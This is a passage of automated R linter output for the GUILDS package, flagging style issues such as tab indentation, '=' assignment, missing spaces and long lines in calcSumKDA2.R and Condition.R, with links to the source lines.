~^~\n```\n[R/calcSumKDA2.R:9:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/calcSumKDA2.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t(lgamma(theta + numbers) - lgamma(theta)) ;\n^\n```\n[R/calcSumKDA2.R:9:9:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/calcSumKDA2.R#L9) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t(lgamma(theta + numbers) - lgamma(theta)) ;\n        ^\n```\n[R/calcSumKDA2.R:9:23:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/calcSumKDA2.R#L9) *style:* **Put spaces around all infix operators.**\n```r\n​\t(lgamma(theta + numbers) - lgamma(theta)) ;\n                     ~^~\n```\n[R/calcSumKDA2.R:9:34:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/calcSumKDA2.R#L9) *style:* **Put spaces around all infix operators.**\n```r\n​\t(lgamma(theta + numbers) - lgamma(theta)) ;\n                                ~^~\n```\n[R/calcSumKDA2.R:10:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/calcSumKDA2.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\n^\n```\n[R/calcSumKDA2.R:10:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/calcSumKDA2.R#L10) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\n^\n```\n[R/calcSumKDA2.R:11:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/calcSumKDA2.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tlog_max = max(outcomes);\n^\n```\n[R/calcSumKDA2.R:11:17:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/calcSumKDA2.R#L11) *style:* **Use <-, not =, for assignment.**\n```r\n​\tlog_max = max(outcomes);\n                ^\n```\n[R/calcSumKDA2.R:11:17:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/calcSumKDA2.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\tlog_max = max(outcomes);\n               ~^~\n```\n[R/calcSumKDA2.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/calcSumKDA2.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tsumlist = sum( exp(outcomes - log_max));\n^\n```\n[R/calcSumKDA2.R:12:17:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/calcSumKDA2.R#L12) *style:* **Use <-, not =, for assignment.**\n```r\n​\tsumlist = sum( exp(outcomes - log_max));\n                ^\n```\n[R/calcSumKDA2.R:12:17:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/calcSumKDA2.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\tsumlist = sum( exp(outcomes - log_max));\n                ^~\n```\n[R/calcSumKDA2.R:12:37:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/calcSumKDA2.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\tsumlist = sum( exp(outcomes - log_max));\n                                   ~^~\n```\n[R/calcSumKDA2.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/calcSumKDA2.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\n^\n```\n[R/calcSumKDA2.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/calcSumKDA2.R#L13) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\n^\n```\n[R/calcSumKDA2.R:14:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/calcSumKDA2.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tresults[i] = log_max + log(sumlist); \n^\n```\n[R/calcSumKDA2.R:14:20:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/calcSumKDA2.R#L14) *style:* **Use <-, not =, for assignment.**\n```r\n​\tresults[i] = log_max + log(sumlist); \n                   ^\n```\n[R/calcSumKDA2.R:14:20:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/calcSumKDA2.R#L14) *style:* **Put spaces around all infix operators.**\n```r\n​\tresults[i] = log_max + log(sumlist); \n                  ~^~\n```\n[R/calcSumKDA2.R:14:30:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/calcSumKDA2.R#L14) *style:* **Put spaces around all infix operators.**\n```r\n​\tresults[i] = log_max + log(sumlist); \n                            ~^~\n```\n[R/calcSumKDA2.R:14:38:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/calcSumKDA2.R#L14) *style:* **Trailing whitespace is superfluous.**\n```r\n​\tresults[i] = log_max + log(sumlist); \n                                     ^\n```\n[R/calcSumKDA2.R:17:10:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/calcSumKDA2.R#L17) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  return((results));\n         ^\n```\n[R/Condition.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​evaluateCondLik <- function(v, theta_x, theta_y, alpha_x, alpha_y, Nx, Ny) {\n^~~~~~~~~~~~~~~\n```\n[R/Condition.R:2:6:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L2) *style:* **Use <-, not =, for assignment.**\n```r\n​  nx = v\n     ^\n```\n[R/Condition.R:3:6:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L3) *style:* **Use <-, not =, for assignment.**\n```r\n​  ny = 1 - nx\n     ^\n```\n[R/Condition.R:4:5:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L4) *style:* **Use <-, not =, for assignment.**\n```r\n​  J = Nx + Ny\n    ^\n```\n[R/Condition.R:5:7:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L5) *style:* **Use <-, not =, for assignment.**\n```r\n​  I_X = alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n      ^\n```\n[R/Condition.R:5:26:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L5) *style:* **Put spaces around all infix operators.**\n```r\n​  I_X = alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                        ~^~\n```\n[R/Condition.R:6:7:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L6) *style:* **Use <-, not =, for assignment.**\n```r\n​  I_Y = alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n      ^\n```\n[R/Condition.R:6:26:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L6) *style:* **Put spaces around all infix operators.**\n```r\n​  I_Y = alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                        ~^~\n```\n[R/Condition.R:8:5:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L8) *style:* **Use <-, not =, for assignment.**\n```r\n​  a = lgamma(J + 1)\n    ^\n```\n[R/Condition.R:9:5:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L9) *style:* **Use <-, not =, for assignment.**\n```r\n​  b = rep(0, length(I_X))\n    ^\n```\n[R/Condition.R:10:10:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L10) *style:* **Use <-, not =, for assignment.**\n```r\n​  poch_X = rep(0, length(I_X))\n         ^\n```\n[R/Condition.R:11:10:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L11) *style:* **Use <-, not =, for assignment.**\n```r\n​  poch_Y = rep(0, length(I_X))\n         ^\n```\n[R/Condition.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L12) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:13:6:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L13) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(cnt in 1:length(I_X)) {\n     ^\n```\n[R/Condition.R:14:12:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L14) *style:* **Use <-, not =, for assignment.**\n```r\n​    b[cnt] = lgamma(I_X[cnt] + I_Y[cnt] + J) - lgamma(I_X[cnt] + I_Y[cnt]);\n           ^\n```\n[R/Condition.R:15:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tpoch_X[cnt] = lgamma(I_X[cnt] + Nx) - lgamma(I_X[cnt]);\n^\n```\n[R/Condition.R:15:21:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L15) *style:* **Use <-, not =, for assignment.**\n```r\n​\tpoch_X[cnt] = lgamma(I_X[cnt] + Nx) - lgamma(I_X[cnt]);\n                    ^\n```\n[R/Condition.R:15:21:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L15) *style:* **Put spaces around all infix operators.**\n```r\n​\tpoch_X[cnt] = lgamma(I_X[cnt] + Nx) - lgamma(I_X[cnt]);\n                   ~^~\n```\n[R/Condition.R:15:39:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L15) *style:* **Put spaces around all infix operators.**\n```r\n​\tpoch_X[cnt] = lgamma(I_X[cnt] + Nx) - lgamma(I_X[cnt]);\n                                     ~^~\n```\n[R/Condition.R:15:45:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L15) *style:* **Put spaces around all infix operators.**\n```r\n​\tpoch_X[cnt] = lgamma(I_X[cnt] + Nx) - lgamma(I_X[cnt]);\n                                           ~^~\n```\n[R/Condition.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tpoch_Y[cnt] = lgamma(I_Y[cnt] + Ny) - lgamma(I_Y[cnt]);\n^\n```\n[R/Condition.R:16:21:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L16) *style:* **Use <-, not =, for assignment.**\n```r\n​\tpoch_Y[cnt] = lgamma(I_Y[cnt] + Ny) - lgamma(I_Y[cnt]);\n                    ^\n```\n[R/Condition.R:16:21:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L16) *style:* **Put spaces around all infix operators.**\n```r\n​\tpoch_Y[cnt] = lgamma(I_Y[cnt] + Ny) - lgamma(I_Y[cnt]);\n                   ~^~\n```\n[R/Condition.R:16:39:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L16) *style:* **Put spaces around all infix operators.**\n```r\n​\tpoch_Y[cnt] = lgamma(I_Y[cnt] + Ny) - lgamma(I_Y[cnt]);\n                                     ~^~\n```\n[R/Condition.R:16:45:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L16) *style:* **Put spaces around all infix operators.**\n```r\n​\tpoch_Y[cnt] = lgamma(I_Y[cnt] + Ny) - lgamma(I_Y[cnt]);\n                                           ~^~\n```\n[R/Condition.R:18:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L18) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:19:5:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L19) *style:* **Use <-, not =, for assignment.**\n```r\n​  c = a - b\n    ^\n```\n[R/Condition.R:20:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L20) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:21:5:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L21) *style:* **Use <-, not =, for assignment.**\n```r\n​  h = poch_X + poch_Y - (lgamma(Nx+1) + lgamma(Ny+1))\n    ^\n```\n[R/Condition.R:21:35:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​  h = poch_X + poch_Y - (lgamma(Nx+1) + lgamma(Ny+1))\n                                 ~^~\n```\n[R/Condition.R:21:50:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​  h = poch_X + poch_Y - (lgamma(Nx+1) + lgamma(Ny+1))\n                                                ~^~\n```\n[R/Condition.R:22:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L22) *style:* **Trailing whitespace is superfluous.**\n```r\n​   \n^~~\n```\n[R/Condition.R:23:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L23) *style:* **lines should not be more than 80 characters.**\n```r\n​  k  =  lgamma((theta_x/2) + (theta_y/2)) - (lgamma(theta_x/2) + lgamma(theta_y/2))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:23:6:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L23) *style:* **Use <-, not =, for assignment.**\n```r\n​  k  =  lgamma((theta_x/2) + (theta_y/2)) - (lgamma(theta_x/2) + lgamma(theta_y/2))\n     ^\n```\n[R/Condition.R:23:16:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L23) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  k  =  lgamma((theta_x/2) + (theta_y/2)) - (lgamma(theta_x/2) + lgamma(theta_y/2))\n               ^\n```\n[R/Condition.R:23:24:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​  k  =  lgamma((theta_x/2) + (theta_y/2)) - (lgamma(theta_x/2) + lgamma(theta_y/2))\n                      ~^~\n```\n[R/Condition.R:23:38:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​  k  =  lgamma((theta_x/2) + (theta_y/2)) - (lgamma(theta_x/2) + lgamma(theta_y/2))\n                                    ~^~\n```\n[R/Condition.R:23:60:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​  k  =  lgamma((theta_x/2) + (theta_y/2)) - (lgamma(theta_x/2) + lgamma(theta_y/2))\n                                                          ~^~\n```\n[R/Condition.R:23:80:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​  k  =  lgamma((theta_x/2) + (theta_y/2)) - (lgamma(theta_x/2) + lgamma(theta_y/2))\n                                                                              ~^~\n```\n[R/Condition.R:24:6:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L24) *style:* **Use <-, not =, for assignment.**\n```r\n​  l  = ((theta_x/2) - 1) * log(nx) + ((theta_y/2) - 1) * log(ny)\n     ^\n```\n[R/Condition.R:24:9:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L24) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  l  = ((theta_x/2) - 1) * log(nx) + ((theta_y/2) - 1) * log(ny)\n        ^\n```\n[R/Condition.R:24:17:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​  l  = ((theta_x/2) - 1) * log(nx) + ((theta_y/2) - 1) * log(ny)\n               ~^~\n```\n[R/Condition.R:24:39:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L24) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  l  = ((theta_x/2) - 1) * log(nx) + ((theta_y/2) - 1) * log(ny)\n                                      ^\n```\n[R/Condition.R:24:47:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​  l  = ((theta_x/2) - 1) * log(nx) + ((theta_y/2) - 1) * log(ny)\n                                             ~^~\n```\n[R/Condition.R:25:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L25) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:26:10:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L26) *style:* **Use <-, not =, for assignment.**\n```r\n​  result = c + h + k + l\n         ^\n```\n[R/Condition.R:31:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L31) *style:* **Variable and function names should be all lowercase.**\n```r\n​calcConditional <- function(v, model, Nx, Ny) {\n^~~~~~~~~~~~~~~\n```\n[R/Condition.R:32:3:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L32) *style:* **Variable and function names should be all lowercase.**\n```r\n​  incorrectLength <- 0;\n  ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:33:5:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(model == \"D0\" && length(v) != 2) incorrectLength <- 1;\n    ^\n```\n[R/Condition.R:33:39:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L33) *style:* **Variable and function names should be all lowercase.**\n```r\n​  if(model == \"D0\" && length(v) != 2) incorrectLength <- 1;\n                                      ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:34:5:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L34) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(model == \"D1\" && length(v) != 3) incorrectLength <- 1;\n    ^\n```\n[R/Condition.R:34:39:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L34) *style:* **Variable and function names should be all lowercase.**\n```r\n​  if(model == \"D1\" && length(v) != 3) incorrectLength <- 1;\n                                      ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:35:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L35) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:36:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L36) *style:* **lines should not be more than 80 characters.**\n```r\n​  if(incorrectLength == 1) { cat(\"Input vector is of incorrect length\\n\"); return; };\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:36:5:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L36) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(incorrectLength == 1) { cat(\"Input vector is of incorrect length\\n\"); return; };\n    ^\n```\n[R/Condition.R:36:6:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L36) *style:* **Variable and function names should be all lowercase.**\n```r\n​  if(incorrectLength == 1) { cat(\"Input vector is of incorrect length\\n\"); return; };\n     ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:36:28:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L36) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​  if(incorrectLength == 1) { cat(\"Input vector is of incorrect length\\n\"); return; };\n                           ^\n```\n[R/Condition.R:36:84:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L36) *style:* **Closing curly-braces should always be on their own line, unless it's followed by an else.**\n```r\n​  if(incorrectLength == 1) { cat(\"Input vector is of incorrect length\\n\"); return; };\n                                                                                   ^\n```\n[R/Condition.R:37:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L37) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:38:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tx <- subplex(initVals, g)\n^\n```\n[R/Condition.R:42:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L42) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:43:5:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L43) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(model == \"D1\") {\n    ^\n```\n[R/Condition.R:46:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L46) *style:* **Trailing whitespace is superfluous.**\n```r\n​ \n^\n```\n[R/Condition.R:47:5:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L47) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_x < 0 ||\n    ^\n```\n[R/Condition.R:51:18:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​     alpha_x > (1-(1e-8)) ||\n                ~^~\n```\n[R/Condition.R:51:19:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L51) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​     alpha_x > (1-(1e-8)) ||\n                  ^\n```\n[R/Condition.R:52:13:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L52) *style:* **Put spaces around all infix operators.**\n```r\n​     alpha_y>(1-(1e-8))\n           ~^~\n```\n[R/Condition.R:52:14:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L52) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​     alpha_y>(1-(1e-8))\n             ^\n```\n[R/Condition.R:52:16:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L52) *style:* **Put spaces around all infix operators.**\n```r\n​     alpha_y>(1-(1e-8))\n              ~^~\n```\n[R/Condition.R:52:17:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L52) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​     alpha_y>(1-(1e-8))\n                ^\n```\n[R/Condition.R:54:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L54) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:56:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L56) *style:* **Trailing whitespace is superfluous.**\n```r\n​ \n^\n```\n[R/Condition.R:58:18:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L58) *style:* **Variable and function names should be all lowercase.**\n```r\n​    return( -1 * evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) );\n                 ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:58:18:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L58) *warning:* **no visible global function definition for ‘evaluateCondLik’**\n```r\n​    return( -1 * evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) );\n                 ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:58:36:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L58) *style:* **Commas should always have a space after.**\n```r\n​    return( -1 * evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) );\n                                   ^\n```\n[R/Condition.R:58:44:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L58) *style:* **Commas should always have a space after.**\n```r\n​    return( -1 * evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) );\n                                           ^\n```\n[R/Condition.R:58:52:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L58) *style:* **Commas should always have a space after.**\n```r\n​    return( -1 * evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) );\n                                                   ^\n```\n[R/Condition.R:58:60:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L58) *style:* **Commas should always have a space after.**\n```r\n​    return( -1 * evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) );\n                                                           ^\n```\n[R/Condition.R:58:68:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L58) *style:* **Commas should always have a space after.**\n```r\n​    return( -1 * evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) );\n                                                                   ^\n```\n[R/Condition.R:58:71:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L58) *style:* **Commas should always have a space after.**\n```r\n​    return( -1 * evaluateCondLik(x,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) );\n                                                                      ^\n```\n[R/Condition.R:60:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L60) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:61:30:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L61) *style:* **Commas should always have a space after.**\n```r\n​  maxes <- pracma::fminbnd(f,0,1,maxiter=500,tol=1e-4);\n                             